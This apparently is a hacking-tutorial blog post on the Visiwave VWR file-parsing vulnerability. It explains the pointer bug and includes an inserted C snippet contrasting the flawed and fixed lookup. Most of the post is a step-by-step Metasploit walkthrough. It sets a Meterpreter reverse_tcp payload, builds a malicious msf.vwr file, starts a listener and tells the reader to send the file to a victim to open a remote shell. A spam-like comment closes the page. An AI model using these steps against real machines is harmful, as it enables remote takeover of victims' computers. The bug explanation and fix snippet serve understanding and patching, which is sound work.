Hack Remote PC using Visiwave VWR File Parsing Vulnerability

This module exploits a vulnerability found in the Visiwave Site Survey Report application. When processing .VWR files, VisiWaveReport.exe attempts to match a valid pointer based on the ‘Type’ property (valid ones include ‘Properties’, ‘Title Page’, ‘Details’, ‘Graph’, ‘Table’, ‘Text’, ‘Image’), but if a match isn’t found, the function that’s supposed to handle this routine ends up returning the input as a pointer, which is later used in a CALL DWORD PTR [EDX+10] instruction. This allows attackers to overwrite it with an arbitrary value, which results in code execution. A patch is available at visiwave.com; the fix XORs the return value to null if no match is found, and the value is then validated before use. NOTE: During installation, the application registers two file type handlers, VWS and VWR, which allows a victim user to ‘double click’ the malicious VWR file and execute code. This module was also built to bypass ASLR and DEP.
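The lookup flaw and its fix described above, as an added C example that is not from the original post, the module, or the vendor's code. It is a simplified model that assumes each valid ‘Type’ maps to a handler object called indirectly; the names struct handler, lookup_flawed, lookup_fixed and dispatch_fixed are hypothetical.

```c
#include <stddef.h>
#include <string.h>

/* Simplified model (assumption): each valid 'Type' maps to a handler
 * object whose function pointer is later called indirectly. */
struct handler {
    const char *type;
    int (*render)(void);
};

static int render_ok(void) { return 0; }

/* The seven valid types listed in the description above. */
static const struct handler HANDLERS[] = {
    {"Properties", render_ok}, {"Title Page", render_ok},
    {"Details", render_ok},    {"Graph", render_ok},
    {"Table", render_ok},      {"Text", render_ok},
    {"Image", render_ok},
};
#define N_HANDLERS (sizeof HANDLERS / sizeof HANDLERS[0])

/* Flawed pattern: on a miss, the file-supplied input is handed back
 * as if it were a handler pointer. */
const void *lookup_flawed(const char *type)
{
    for (size_t i = 0; i < N_HANDLERS; i++)
        if (strcmp(HANDLERS[i].type, type) == 0)
            return &HANDLERS[i];
    return type; /* BUG: caller cannot tell this from a real handler */
}

/* Fixed pattern: a miss yields NULL. */
const void *lookup_fixed(const char *type)
{
    for (size_t i = 0; i < N_HANDLERS; i++)
        if (strcmp(HANDLERS[i].type, type) == 0)
            return &HANDLERS[i];
    return NULL;
}

/* Caller validates before the indirect call; -1 means "rejected". */
int dispatch_fixed(const char *type)
{
    const struct handler *h = lookup_fixed(type);
    if (h == NULL || h->render == NULL)
        return -1;
    return h->render();
}
```

Both halves of the fix matter: the lookup must signal a miss with NULL, and the caller must check for it before the indirect call.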

Exploit Targets


Windows XP SP2


Attacker: BackTrack 5

Victim PC: Windows XP

Open a BackTrack terminal and type msfconsole

Now type use exploit/windows/fileformat/visiwave_vwr_type

msf exploit(visiwave_vwr_type) > set payload windows/meterpreter/reverse_tcp

msf exploit(visiwave_vwr_type) > set lhost (IP of Local Host)

msf exploit(visiwave_vwr_type) > exploit

After the malicious file is generated successfully, it is stored on your local computer.


Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit executes successfully.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost


Now send your msf.vwr file to the victim. As soon as they download and open it, you can access a meterpreter shell on the victim computer.

1 Comment Hack Remote PC using Visiwave VWR File Parsing Vulnerability

  1. exclusivehack

    Thanks for a marvelous posting! I genuinely enjoyed reading it, you could be a great author. I will be sure to bookmark your blog and definitely will come back in the future. I want to encourage yourself to continue your great posts, have a nice afternoon!

